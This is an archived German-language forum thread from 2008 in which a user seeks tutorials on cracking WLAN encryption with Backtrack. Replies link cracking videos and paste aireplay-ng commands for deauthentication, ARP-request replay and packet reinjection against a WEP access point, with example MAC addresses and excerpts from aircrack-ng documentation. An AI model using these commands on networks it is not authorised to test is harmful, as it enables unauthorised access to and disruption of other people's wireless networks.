Archiv verlassen und diese Seite im Standarddesign anzeigen : [S] Backtrack (2) Video TUT zwecks w-lan cracking

04.03.2008, 21:38
wie oben steht such ich jemanden der in der Lage ist ein Video TUT zum Thema w-lan hacking, wenns geht unter Backtrack 2 oder 3....
Eigendlich kann ich das auch selber aber mit diesem Aireplay da haperts ^^...

naja vielleicht hat einer ja mal langeweile...

mfg Dennis

Dr. Anonymous
04.03.2008, 21:46
Schau mal hier: http://video.aircrack-ng.org/noclient/

04.03.2008, 22:00
:roll: oO da ist das auch noch auf der Aircrack seite, sorry da hab ich nicht nach geguckt, danke dir ;)

mfg Dennis

//Mein problem wurde trotzdem nicht behoben...

Ich bräuchte eins wo jemand auch mal erklärt.....

Dr. Anonymous
05.03.2008, 12:30
Ja nach so einem bin ich auch auf der Suche^^.

Wenn du noch eins findest, kannst du es hier bitte posten?

05.03.2008, 12:46
BANG (http://s32.photobucket.com/player.swf?refURL=http://s32.photobucket.com/albums/d25/Pirate1976/%3faction=view&current=8fb7a370.flv/&file=http://vid32.photobucket.com/albums/d25/Pirate1976/8fb7a370.flv&fs=1&os=1&ap=1)
BANG (http://s32.photobucket.com/player.swf?refURL=http://forums.remote-exploit.org/showthread.php%3ft=7872/&file=http://vid32.photobucket.com/albums/d25/Pirate1976/-Xploitz-WEPCRACKINGWITHKOREKCHOPCH.flv&t=1186176449&os=1&ap=1)
BANG (http://s32.photobucket.com/player.swf?refURL=http://s32.photobucket.com/albums/d25/Pirate1976/%3faction=view&current=XploitzVideoE-ZWPAWPA2CrackingTuto.flv/&file=http://vid32.photobucket.com/albums/d25/Pirate1976/XploitzVideoE-ZWPAWPA2CrackingTuto.flv&fs=1&os=1&ap=1)
BANG (http://s32.photobucket.com/player.swf?refURL=http://s32.photobucket.com/albums/d25/Pirate1976/%3faction=view&current=-Xploitz-Airolibaircrack-ngTutorial.flv/&file=http://vid32.photobucket.com/albums/d25/Pirate1976/-Xploitz-Airolibaircrack-ngTutorial.flv&fs=1&os=1&ap=1)


:roll: oO da ist das auch noch auf der Aircrack seite, sorry da hab ich nicht nach geguckt, danke dir ;)

mfg Dennis

//Mein problem wurde trotzdem nicht behoben...

Ich bräuchte eins wo jemand auch mal erklärt.....

sag doch einfach was dein Problem ist.
Ein tut was alles erklärt wirste kaum finden bzw. als VIDEO-TUT

05.03.2008, 13:22
wenn man englisch kann (sollte man auch wenn man im web surft) 8) sollte hier schauen:

und dann unter hacking illustrated videos

07.03.2008, 23:11
kann jemand mal den Aireplay Befehl erläutern und mal ein paar Beispiele der Funktionen darleben wäre nett...

mfg Dennis

08.03.2008, 00:05
kann jemand mal den Aireplay Befehl erläutern und mal ein paar Beispiele der Funktionen darleben wäre nett...

mfg Dennis



ARP-Anfragen mit einer Prism2 Karte generieren

airmon.sh start wlan0
airodump wlan0 out 6 (zu einer anderen Konsole wechseln)
aireplay -0 10 -a 00:13:10:30:24:9C wlan0
aireplay -3 -b 00:13:10:30:24:9C -h 00:09:5B:EB:C5:2B wlan0

English hilft : D


This attack allows you to choose a given packet for replaying; it sometimes gives more effective results than attack 3 (automatic ARP reinjection).

You could use it, for example, to attempt the "any data re-broadcast" attack, which only works if the AP actually reencrypts WEP data packets:

aireplay -2 -b 00:13:10:30:24:9C -n 100 -p 0841 \
-h 00:09:5B:EB:C5:2B -c FF:FF:FF:FF:FF:FF ath0

You can also use attack 2 to manually replay WEP-encrypted ARP request packets, which size is either 68 or 86 bytes (depending on the operating system):

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 68 -n 68 -p 0841 -h 00:09:5B:EB:C5:2B ath0

aireplay -2 -b 00:13:10:30:24:9C -d FF:FF:FF:FF:FF:FF \
-m 86 -n 86 -p 0841 -h 00:09:5B:EB:C5:2B ath0

# Attack 3: ARP-request reinjection

The classic ARP-request replay attack is the most effective to generate new IVs, and works very reliably. You need either the MAC address of an associated client (00:09:5B:EB:C5:2B), of a fake MAC from attack 1 (00:11:22:33:44:55). You may have to wait for a couple of minutes, or even longer, until an ARP request shows up; this attack will fail if there is no traffic.

Please note that you can also reuse ARP requests from a previous capture using the -r switch.

aireplay -3 -b 00:13:10:30:24:9C -h 00:11:22:33:44:55 ath0
Saving ARP requests in replay_arp-0627-121526.cap
You must also start airodump to capture replies.
Read 2493 packets (got 1 ARP requests), sent 1305 packets...

# Attacke 4: KoreK's "chopchop" (CRC prediction)

This attack, when successful, can decrypt a WEP data packet without knowing the key. It can even work against dynamic WEP. This attack does not recover the WEP key itself, but merely reveals the plaintext. However, most access points are not vulnerable at all. Some may seem vulnerable at first but actually drop data packets shorter that 60 bytes. This attack requires at least one WEP data packet.

08.03.2008, 11:17
vielen Dank Blokkmonsta hat mir seht geholfen ;)

mfg Dennis

@mods: kann geclosed werden, ich hab keine frage mehr..

Added after 10 minutes:

vielen Dank Blokkmonsta hat mir seht geholfen ;)

mfg Dennis

@mods: kann geclosed werden, ich hab keine frage mehr..

@ich schätze mal ich hab mein problem gefunden -.- ich hab ne karte und wie hier steht unter stützt die kein aireplay :( http://repat.re.ohost.de/aircrack.html

fuck... hat jemand vielleicht die selbe karte und gehts bei ihm trotzdem ????????????????